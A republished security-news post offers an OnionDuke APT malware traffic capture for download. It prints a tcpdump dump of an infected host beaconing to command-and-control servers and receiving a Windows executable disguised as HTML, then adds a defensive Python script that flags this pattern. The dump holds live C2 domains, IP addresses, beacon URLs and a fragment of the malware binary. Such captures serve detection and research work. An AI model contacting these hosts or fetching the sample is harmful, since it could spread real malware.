
OnionDuke APT Malware Traffic Sample PCAP Download


Download OnionDuke APT Malware: onionduke


1970-01-01 -4:-58:-32.468345 IP 10.0.2.15.1025 > 10.0.2.2.53: 56315+ A? rombeast.site50.net. (37)
E..A.q….”+

……5.-……………rombeast.site50.net…..
1970-01-01 -4:-58:-32.492920 IP 10.0.2.2.53 > 10.0.2.15.1025: 56315 1/2/0 A 31.170.162.243 (103)
E…./[email protected]+

….5…o\…………..rombeast.site50.net…………..X…………..Q….ns2
000webhost.com………Q….ns1.E
1970-01-01 -4:-58:-32.496438 IP 10.0.2.15.1048 > 31.170.162.243.80: Flags [S], seq 3752956870, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0.r@…+.
……….P……..p…A………..
1970-01-01 -4:-58:-32.595297 IP 31.170.162.243.80 > 10.0.2.15.1048: Flags [S.], seq 64001, ack 3752956871, win 65535, options [mss 1460], length 0
E..,.0..@…….
….P……….`…W…….
1970-01-01 -4:-58:-32.595497 IP 10.0.2.15.1048 > 31.170.162.243.80: Flags [.], ack 1, win 64240, length 0
E..(.s@…+.
……….P……..P…tS……..
1970-01-01 -4:-58:-32.595729 IP 10.0.2.15.1048 > 31.170.162.243.80: Flags [P.], seq 1:289, ack 1, win 64240, length 288: HTTP: GET /forum/phpBB3/menu.php?ghdfjk=atccRAyuTJdPyQiNG6pFyBy3ScAf+QicXPsfnlz7HZRZyQiNBqcSjR2mSckfok/IZeMI3Q6kTfIGpxKNH69dygatW6dP40DCHLd3xAv5CJxX8hGVW/QZnVg= HTTP/1.1
E..H.t@…*.
……….P……..P…R1..GET /forum/phpBB3/menu.php?ghdfjk=atccRAyuTJdPyQiNG6pFyBy3ScAf+QicXPsfnlz7HZRZyQiNBqcSjR2mSckfok/IZeMI3Q6kTfIGpxKNH69dygatW6dP40DCHLd3xAv5CJxX8hGVW/QZnVg= HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rombeast.site50.net
Cache-Control: no-cache

1970-01-01 -4:-58:-32.595780 IP 31.170.162.243.80 > 10.0.2.15.1048: Flags [.], ack 289, win 65535, length 0
E..(.1..@…….
….P……….P…n$..
1970-01-01 -4:-58:-32.866662 IP 31.170.162.243.80 > 10.0.2.15.1048: Flags [P.], seq 1:1408, ack 289, win 65535, length 1407: HTTP: HTTP/1.1 200 OK
E…[email protected]….
….P……….P…….HTTP/1.1 200 OK
Date: Wed, 18 Dec 2013 03:49:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Length: 1243
Connection: close
Content-Type: text/html




1970-01-01 -4:-58:-32.875339 IP 10.0.2.15.1025 > 10.0.2.2.53: 6529+ A? www.226ers.es. (31)
E..;.w….”+

……5.’……………www.226ers.es…..
1970-01-01 -4:-58:-31.093371 IP 10.0.2.2.53 > 10.0.2.15.1025: 6529 1/3/0 A 208.113.199.191 (114)
E…[email protected].

….5…z.4………….www.226ers.es………….8@…q……….Q….ns1 dreamhost.com………Q….ns2.?……..Q….ns3.?
1970-01-01 -4:-58:-31.093919 IP 10.0.2.15.1049 > 208.113.199.191.80: Flags [S], seq 1505536384, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0.x@…V.
….q…..PY…….p….H……….
1970-01-01 -4:-58:-31.181729 IP 208.113.199.191.80 > 10.0.2.15.1049: Flags [S.], seq 192001, ack 1505536385, win 65535, options [mss 1460], length 0
E..,[email protected]..
….P……Y…`….+……
1970-01-01 -4:-58:-31.184827 IP 10.0.2.15.1049 > 208.113.199.191.80: Flags [.], ack 1, win 64240, length 0
E..(.y@…V.
….q…..PY…….P………….
1970-01-01 -4:-58:-31.185054 IP 10.0.2.15.1049 > 208.113.199.191.80: Flags [P.], seq 1:147, ack 1, win 64240, length 146: HTTP: GET /sysinfo_7.php HTTP/1.1
E….z@…U.
….q…..PY…….P….B..GET /sysinfo_7.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.226ers.es
Cache-Control: no-cache

1970-01-01 -4:-58:-31.185134 IP 208.113.199.191.80 > 10.0.2.15.1049: Flags [.], ack 147, win 65535, length 0
E..([email protected]..
….P……Y…P….W..
1970-01-01 -4:-58:-31.274162 IP 208.113.199.191.80 > 10.0.2.15.1049: Flags [P.], seq 1:533, ack 147, win 65535, length 532: HTTP: HTTP/1.1 503 Service Temporarily Unavailable
E..<[email protected]..
….P……Y…P….W..HTTP/1.1 503 Service Temporarily Unavailable
Date: Wed, 18 Dec 2013 03:52:32 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 323
Connection: close
Content-Type: text/html; charset=iso-8859-1

503 Service Temporarily Unavailable

Service Temporarily Unavailable

The server is temporarily unable to service your
request due to maintenance downtime or capacity
problems. Please try again later.


1970-01-01 -4:-58:-31.400301 IP 10.0.2.15.1050 > 31.170.162.243.80: Flags [P.], seq 1:163, ack 1, win 64240, length 162: HTTP: GET /forum/phpBB3/prx_26.php HTTP/1.1
E…..@…+.
……….P.1……P…….GET /forum/phpBB3/prx_26.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rombeast.site50.net
Cache-Control: no-cache

1970-01-01 -4:-58:-31.400374 IP 31.170.162.243.80 > 10.0.2.15.1050: Flags [.], ack 163, win 65535, length 0
E..(.<..@…….
….P…….1.rP…y…
1970-01-01 -4:-58:-31.610731 IP 31.170.162.243.80 > 10.0.2.15.1050: Flags [P.], seq 1:171, ack 163, win 65535, length 170: HTTP: HTTP/1.1 200 OK
E….=..@..=….
….P…….1.rP….d..HTTP/1.1 200 OK
Date: Wed, 18 Dec 2013 03:49:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

1970-01-01 -4:-58:-31.616302 IP 31.170.162.243.80 > 10.0.2.15.1050: Flags [.], seq 171:1591, ack 163, win 65535, length 1420: HTTP
E….>[email protected]….
….P…….1.rP…….27400
MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
$………A…/D../D../D&..D../D…D../D…D../D…D../D…D../D…D../D…D1./D…D../D…D../D…D../DRich../D……..PE..L…!..R………..!..
………….%8…………………………………………….@……………………..>…….4..x………………………………………………………….H…@……………………………………..text…X……………………… ..`.rdata…_…….`………………@[email protected]….6…@………………….@….reloc..v-………..F…………[email protected]…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………….U…E..V….X…t V.3……..^]………………A……………A…………..U…..H….R,P.E.P..]………………………U..V…………..E..t V……….^]……………………….U…F..M.;.s4…U.;.w+W..+….;F.u………F…t…….._.F..]…;F.u….c….F…t..M….F..]……………….I..A.+………U..j.h….d…[email protected]……..u…`….E……F…t.P.-…..
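As an added example (not part of the original post), here is a small Python detection pass over tcpdump -A style text like the dump above. It reconstructs the DNS answer for the beacon host and the HTTP exchanges, then flags the two things this capture shows a defender: a request to a .php resource whose query value is a long base64-looking blob, and a response labelled text/html whose body carries the PE "MZ" header and DOS stub (an executable delivered as a web page). The sample input is trimmed from the lines above with most raw payload lines removed; the regexes, finding names and the `analyze` function are my own, and it is a line parser, not a pcap decoder.

```python
"""Added example (not from the original post): a detection pass over tcpdump -A
style text such as the OnionDuke capture above.  It reconstructs the DNS answer
for the beacon host and the HTTP exchanges, then flags (1) a .php request whose
query value is a long base64-looking blob and (2) a response labelled text/html
whose body carries the PE 'MZ' header / DOS stub.  Regexes and finding names are
the author's own; this is a line parser, not a pcap decoder."""
import re
from collections import defaultdict

RECORD_RE = re.compile(r"^(\S+ \S+) IP (?P<src>\S+) > (?P<dst>\S+): (?P<rest>.*)$")
DNS_Q = re.compile(r"^(\d+)\+ A\? (\S+)\.")
DNS_A = re.compile(r"^(\d+) \d+/\d+/\d+ A (\d+\.\d+\.\d+\.\d+)")
REQ_RE = re.compile(r"HTTP: (GET|POST) (\S+)")
STATUS_RE = re.compile(r"HTTP: HTTP/1\.[01] (\d{3})")
HEADER_RE = re.compile(r"^([A-Za-z-]+): (.*)$", re.M)
BASE64ISH = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")  # long base64-looking value
DOS_STUB = "This program cannot be run in DOS mode"

# Constructed input: lines trimmed from the capture above, raw payload lines mostly dropped.
SAMPLE_DUMP = """\
1970-01-01 -4:-58:-32.468345 IP 10.0.2.15.1025 > 10.0.2.2.53: 56315+ A? rombeast.site50.net. (37)
1970-01-01 -4:-58:-32.492920 IP 10.0.2.2.53 > 10.0.2.15.1025: 56315 1/2/0 A 31.170.162.243 (103)
1970-01-01 -4:-58:-32.595729 IP 10.0.2.15.1048 > 31.170.162.243.80: Flags [P.], seq 1:289, ack 1, win 64240, length 288: HTTP: GET /forum/phpBB3/menu.php?ghdfjk=atccRAyuTJdPyQiNG6pFyBy3ScAf+QicXPsfnlz7HZRZyQiNBqcSjR2mSckfok/IZeMI3Q6kTfIGpxKNH69dygatW6dP40DCHLd3xAv5CJxX8hGVW/QZnVg= HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: rombeast.site50.net
1970-01-01 -4:-58:-32.866662 IP 31.170.162.243.80 > 10.0.2.15.1048: Flags [P.], seq 1:1408, ack 289, win 65535, length 1407: HTTP: HTTP/1.1 200 OK
Content-Length: 1243
Content-Type: text/html
1970-01-01 -4:-58:-31.185054 IP 10.0.2.15.1049 > 208.113.199.191.80: Flags [P.], seq 1:147, ack 1, win 64240, length 146: HTTP: GET /sysinfo_7.php HTTP/1.1
Host: www.226ers.es
1970-01-01 -4:-58:-31.274162 IP 208.113.199.191.80 > 10.0.2.15.1049: Flags [P.], seq 1:533, ack 147, win 65535, length 532: HTTP: HTTP/1.1 503 Service Temporarily Unavailable
Content-Type: text/html; charset=iso-8859-1
1970-01-01 -4:-58:-31.400301 IP 10.0.2.15.1050 > 31.170.162.243.80: Flags [P.], seq 1:163, ack 1, win 64240, length 162: HTTP: GET /forum/phpBB3/prx_26.php HTTP/1.1
Host: rombeast.site50.net
1970-01-01 -4:-58:-31.610731 IP 31.170.162.243.80 > 10.0.2.15.1050: Flags [P.], seq 1:171, ack 163, win 65535, length 170: HTTP: HTTP/1.1 200 OK
Transfer-Encoding: chunked
Content-Type: text/html
1970-01-01 -4:-58:-31.616302 IP 31.170.162.243.80 > 10.0.2.15.1050: Flags [.], seq 171:1591, ack 163, win 65535, length 1420: HTTP
....P.......1.rP.......27400
MZ......................@........ .!..L.!This program cannot be run in DOS mode..
"""


def parse_records(dump):
    """Split tcpdump output into records: one summary line plus its payload lines."""
    records, current = [], None
    for line in dump.splitlines():
        m = RECORD_RE.match(line)
        if m:
            current = {"src": m["src"], "dst": m["dst"], "summary": m["rest"], "payload": []}
            records.append(current)
        elif current is not None:
            current["payload"].append(line)
    return records


def analyze(dump):
    """Return (findings, resolved): finding tuples and the DNS name -> address map."""
    pending, resolved, findings = {}, {}, []
    responses = {}              # (server, client) -> (status, headers) of the last response seen
    bodies = defaultdict(list)  # payload text seen on that flow from the response onward
    for rec in parse_records(dump):
        summ, payload = rec["summary"], "\n".join(rec["payload"])
        headers = dict(HEADER_RE.findall(payload))
        key = (rec["src"], rec["dst"])
        if m := DNS_Q.match(summ):
            pending[m[1]] = m[2]
        elif (m := DNS_A.match(summ)) and m[1] in pending:
            resolved[pending.pop(m[1])] = m[2]
        elif m := REQ_RE.search(summ):
            path, _, query = m[2].partition("?")
            host = headers.get("Host", rec["dst"])
            for param in filter(None, query.split("&")):
                name, _, value = param.partition("=")
                if BASE64ISH.match(value):  # encoded beacon data riding in the query string
                    findings.append(("encoded-query", host, path, name))
            if path.endswith(".php"):
                findings.append(("php-request", host, path))
        elif m := STATUS_RE.search(summ):
            responses[key] = (m[1], headers)
            bodies[key] = [payload]
        elif key in responses:  # continuation segment of a response already seen
            bodies[key].append(payload)
    for key, (status, headers) in responses.items():
        body = "\n".join(bodies[key])
        ctype = headers.get("Content-Type", "")
        # Advertised as HTML, but the bytes are a Windows executable.
        if ctype.startswith("text/html") and (DOS_STUB in body or re.search(r"^MZ", body, re.M)):
            findings.append(("pe-as-html", key[0], key[1], status, ctype))
    return findings, resolved


if __name__ == "__main__":
    found, names = analyze(SAMPLE_DUMP)
    for name, addr in names.items():
        print(f"dns  {name} -> {addr}")
    for f in found:
        print("flag", *f)
```

On the trimmed capture the pass resolves rombeast.site50.net to 31.170.162.243, records the three .php requests, flags the menu.php query value as an encoded blob, and flags the chunked 200 OK on the prx_26.php flow as a PE served with a text/html Content-Type. The same mismatch check (declared type versus leading bytes) is cheap to run on a proxy log or in a Suricata/Zeek file-analysis hook.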



This post first appeared on Computer Security.org - CyberSecurity News, Inform, please read the original post: here
